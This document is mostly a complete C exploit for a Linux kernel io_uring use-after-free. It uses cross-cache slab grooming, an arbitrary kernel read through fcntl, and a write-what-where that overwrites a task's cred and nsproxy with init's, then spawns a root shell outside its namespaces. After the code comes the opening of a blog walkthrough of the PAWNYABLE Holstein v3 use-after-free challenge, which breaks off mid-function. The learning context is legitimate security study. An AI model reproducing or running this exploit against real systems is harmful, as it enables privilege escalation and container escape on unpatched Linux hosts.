// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;

    if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }

    lim.rlim_cur = old_lim.rlim_max;
    lim.rlim_max = old_lim.rlim_max;

    if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
        err("`setrlimit()` failed: %s", strerror(errno));
    }

    // rlim_t is an unsigned long on Linux, so print with %lu rather than %d
    info("Increased fd limit from %lu to %lu",
         (unsigned long)old_lim.rlim_cur, (unsigned long)lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ %p", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB - 1 objects to *probably* create a new active slab
void cc_2(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read the first 8 bytes of comm, which is enough to
    // cover our 6-character task names plus the NUL terminator
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our own comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our io_uring file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determining which side of the page the UAF file is
// on. If it's on the front half of the page, the back half is our scratch
// space and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed the cross-cache stage (e.g. we didn't replace the UAF object)
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...\n");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_cred: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}
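The two constraints described in the comment above overwrite_cred() (a 4-byte write whose stored value ends up one higher than requested) can be modeled in userland. This is only a sketch, not exploit code: model_write32() is a hypothetical stand-in for write_what_where() that stores what + 1 into a plain byte array, and that increment behavior is an assumption taken from the comment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the primitive: the stored 32-bit value ends up one
 * higher than the `what` we asked for (assumed from the comment above). */
static void model_write32(uint8_t *mem, size_t where, uint32_t what)
{
    assert(mem != NULL);
    uint32_t stored = what + 1u; /* unsigned arithmetic wraps modulo 2^32 */
    for (size_t i = 0; i < 4; i++) {
        mem[where + i] = (uint8_t)(stored >> (8 * i)); /* little-endian */
    }
}

/* Write a 64-bit value as two pre-decremented 32-bit halves. */
static void model_write64(uint8_t *mem, size_t where, uint64_t value)
{
    uint32_t lo = (uint32_t)(value & 0xFFFFFFFFu);
    uint32_t hi = (uint32_t)(value >> 32);

    model_write32(mem, where, lo - 1u);
    model_write32(mem, where + 4, hi - 1u);
}

/* Read the value back so the round trip can be checked. */
static uint64_t model_read64(const uint8_t *mem, size_t where)
{
    assert(mem != NULL);
    uint64_t value = 0;
    for (size_t i = 0; i < 8; i++) {
        value |= (uint64_t)mem[where + i] << (8 * i);
    }
    return value;
}
```

A half that is zero still round-trips in this model, because 0 - 1 wraps to 0xFFFFFFFF and the increment wraps it back to 0.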

PAWNYABLE UAF Walkthrough (Holstein v3)

2022-10-29T00:00:00+00:00

Introduction

I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and your first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but started gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually led to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated), I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

Introduction to kernel exploits
kernel debugging with gdb
security mechanism (Overview of Exploitation Mitigations)
Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized that you don’t have to spend time setting up your environment. It’s basically just copy-pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

Next, I started working on the first challenge, which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer, and from there you’re learning how CTF players (and security researchers) often leverage kernel code execution to escalate privileges, for example by calling prepare_kernel_cred and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

A quick look at the vulnerable driver provided by the author makes the problem clear.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_close called\n");
  kfree(g_buf);
  return 0;
}

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

We’ve done nothing, g_buf = NULL
We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
We’ve opened the driver a second time, g_buf = 0xffff...b0. The original value of 0xffff...a0 has been overwritten, so it can no longer be freed and becomes a memory leak (not super important). We now have fd2 in our program
We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.
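The open/open/close sequence above can be traced with a small userland model. This is a sketch under stated assumptions, not driver code: struct driver_model and the model_* helpers are hypothetical names, allocations are represented by integer ids instead of real pointers, and nothing is actually freed, so the model itself has no memory-safety issues.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define MODEL_MAX_ALLOCS 8
#define MODEL_NULL (-1)

struct driver_model {
    bool live[MODEL_MAX_ALLOCS]; /* live[i]: allocation i has not been freed */
    int  next_id;                /* next allocation id to hand out */
    int  g_buf;                  /* id g_buf points at, or MODEL_NULL */
};

static void model_init(struct driver_model *m)
{
    assert(m != NULL);
    for (int i = 0; i < MODEL_MAX_ALLOCS; i++) {
        m->live[i] = false;
    }
    m->next_id = 0;
    m->g_buf = MODEL_NULL;
}

/* Mirrors module_open(): every open overwrites the single global pointer. */
static void model_open(struct driver_model *m)
{
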